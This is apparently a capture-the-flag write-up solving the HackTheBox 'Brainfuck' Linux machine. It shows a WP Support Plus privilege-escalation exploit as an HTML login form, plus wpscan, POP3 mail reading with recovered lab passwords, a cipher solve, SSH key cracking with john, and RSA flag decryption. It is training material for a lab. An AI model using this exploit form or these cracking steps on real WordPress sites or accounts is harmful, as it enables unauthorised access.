Today we’re going to solve another CTF machine “Brainfuck”. It is now retired box and can be accessible if you’re a VIP member.
- Target OS: Linux
- Services: SSH, SMTP, POP3, IMAP, SSL
- IP Address: 10.10.10.17
- Difficulty: Hard
- RSA Decryption
- Getting user
- Getting root
As always, the first step consists of reconnaissance phase as port scanning.
During this step we’re gonna identify the target to see what we have behind the IP Address.
From the above screenshot we can observe many opened ports and we have DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb subdomains on 443 Port.
Let’s point these domains to IP address on /etc/hosts
Now let’s access these domains and see what we can find.
So we have two different CMS installed let’s enumerate both.
We have a wordpress installed at https://brainfuck.htb and if you take a look at first post there is a email address which we have to keep in mind because brainfuck has smtp and pop3 ports opened so this might comes handy.
Let’s run wpscan to see if we can find something interesting.
wpscan --url https://brainfuck.htb --disable-tls-checks
We found two users from wpscan “admin & administrator” and we have one plugin installed which is vulnerable to exploit.
searchsploit WP Support Plus
In our case we’re gonna test “WP Support Plus Responsive Ticket System 7.1.3 – Privilege Escalation”.
We have to modify our POST request in order to make it work.
<form method="post" action="http://wp/wp-admin/admin-ajax.php"> Username: <input type="text" name="username" value="administrator"> <input type="hidden" name="email" value="sth"> <input type="hidden" name="action" value="loginGuestFacebook"> <input type="submit" value="Login"> </form>
We know the email which we found in one of the article.
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php"> Username: <input type="text" name="username" value="admin"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="action" value="loginGuestFacebook"> <input type="submit" value="Login"> </form>
We changed these values username: admin | email: [email protected] and the action url to https://brainfuck.htb.
Now to send a POST request we have to create a index.html and paste our modified exploit and run python HTTP server.
python -m SimpleHTTPServer 80
After clicking on login this comes up a blank white page.
Now just simply remove /wp-admin/admin-ajax.php from the url and go back to https://brainfuck.htb you will see the admin toolbar.
Getting reverse shell is easy through wordpress but we don’t have write access :/ so we have another challenge waiting for us to get to reverse shell.
After searching things i found another plugin installed which wpscan didn’t find i don’t know why but let’s take a look at it.
This is the information which we found at the smtp plugin settings.
If we inspect at the SMTP Password field we can see the password “kHGuERB29DNiNE“.
Since we found an SMTP password we can try connecting through: telnet 10.10.10.17 110 We was able to establish connection.
User: orestis Password: kHGuERB29DNiNE
After successfuly login we can use list command to display messages.
list +OK 2 messages: 1 977 2 514
We can read them using retr command.
retr 1 +OK 977 octets Return-Path: <[email protected]> X-Original-To: [email protected] Delivered-To: [email protected] Received: by brainfuck (Postfix, from userid 33) id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST) To: [email protected] Subject: New WordPress Site X-PHP-Originating-Script: 33:class-phpmailer.php Date: Mon, 17 Apr 2017 17:15:40 +0000 From: WordPress <[email protected]> Message-ID: <[email protected]> X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Your new WordPress site has been successfully set up at: https://brainfuck.htb You can log in to the administrator account with the following information: Username: admin Password: The password you chose during the install. Log in here: https://brainfuck.htb/wp-login.php We hope you enjoy your new site. Thanks! --The WordPress Team https://wordpress.org/
To read 2 message.
retr 2 +OK 514 octets Return-Path: <[email protected]> X-Original-To: orestis Delivered-To: [email protected] Received: by brainfuck (Postfix, from userid 0) id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST) To: [email protected] Subject: Forum Access Details Message-Id: <[email protected]> Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST) From: [email protected] (root) Hi there, your credentials for our "secret" forum are below :) username: orestis password: kIEnnfEKJ#9UmdO Regards
If you take a look we found something interesting which is,
username: orestis password: kIEnnfEKJ#9UmdO
If you read the description of the second message it says credentials for “secret” forum 🙂 so let’s try login.
Let’s take a look at ‘Key‘ thread first.
Now take a look at ‘SSH Access’ thread.
‘Key‘ thread is encrypted somehow because if you take a look at the conversation between admin and orestis inside ‘SSH Access‘ thread orestis is asking admin for SSH key which he lost after that then orestis created another thread named it ‘Key‘ and there both admin and orestis talked about something which is not possible to understand.
It’s some kind of encryption which we don’t know yet. Since we don’t have any clue to decrypt the text let’s copy both threads text and place them under each to take a closer look.
We took both thread reply which was posted by orestis.
- Cipher Text Mya qutf de buj otv rms dy srd vkdof :) Pieagnm - Jkoijeg nbw zwx mle grwsnn - Plain Text Go fuck yourself admin, I am locked out!! send me my key asap! Orestis - Hacking for fun and profit
If you look closer.
- Cipher Text Pieagnm - Jkoijeg nbw zwx mle grwsnn - Plain Text Orestis - Hacking for fun and profit
We have to consider cipher text is encrypted information and plain text as a decrypting key.
This is the output which we got!
Brainfu - Ckmybra inf uck myb rainfu
Let’s remove spaces and read it again 😉
This is the decipher text we got.
And it you remember there’s a cipher text of url but there’s no decrypting key in ‘SSH Access‘ thread so that means we have to find another way to decrypt that.
Since we decrypted our first text and it keeps repeating a phrase ‘fuckmybrain‘ we can assume it can be a decrypting key for next encrypted cipher.
And we got an actual URL for id_rsa key 🙂
We found a key but upon opening it we found that it is locked.
There’s a tool called john the ripper which we’ll use to crack the password. We cannot directly crack the id_rsa key we have to first convert it into john the ripper format.
Upon doing research you’ll find a tool called: sshng2john.py
python sshng2john.py id_rsa > ssh_key
Now we’re ready to crack the password.
john ssh_key --wordlist=/usr/share/wordlists/rockyou.txt
And after few seconds we got the password: 3poulakia!
Let’s try to login to SSH using a key and password.
ssh -i id_rsa [email protected]
Now that we have found our user.txt flag we’re going after root.txt. Apart from user.txt we found another 3 uncommon files inside /home/orestis/ debug.txt, encrypt.sage, output.txt
Since we don’t know what’s inside those files so i reached Google for answers and i found a RSA Decryption tools.
It appears that the file output.txt file contains an encrypted root flag and the file debug.txt contains the P, Q and E values used to do the encryption. By using the above tool it is possible to decrypt the ciphertext and get the root flag.
After running the script we found our root.txt flag.